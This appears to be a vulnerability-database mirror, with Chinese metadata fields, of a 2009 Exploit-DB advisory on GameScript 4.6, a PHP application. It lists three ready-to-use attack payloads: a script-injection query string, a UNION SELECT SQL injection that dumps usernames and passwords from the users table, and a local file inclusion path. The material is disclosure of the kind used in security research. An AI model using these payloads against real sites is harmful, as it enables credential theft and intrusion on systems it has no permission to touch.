gamescript 4.6 - Cross-Site Scripting / SQL Injection / Local File Inclusion

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1057374 漏洞类型
发布时间 2009-01-28 更新时间 2009-01-28
CVE编号 N/A CNNVD-ID N/A
漏洞平台 PHP CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/7893
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
GameScript 4.6 Multiple Vulnerabillities
(Earlier versions might be affected)

By : Encrypt3d.M!nd

Demo :www.gsdemo.com
just bored  :) 
There are other vulnerabillities i think

Iam Iraqian...Not Arabian
###################################################

Xss :

/games.php?search="<script>alert(666);</script>


Sql injection :

/page.php?page=viewprofile&user=-Encrypt3d'%20union%20select%201,2,username,4,5,password,7,8,9,10,11,12%20from%20users/*

Local File Include :

/page.php?page=file_to_include

# milw0rm.com [2009-01-28]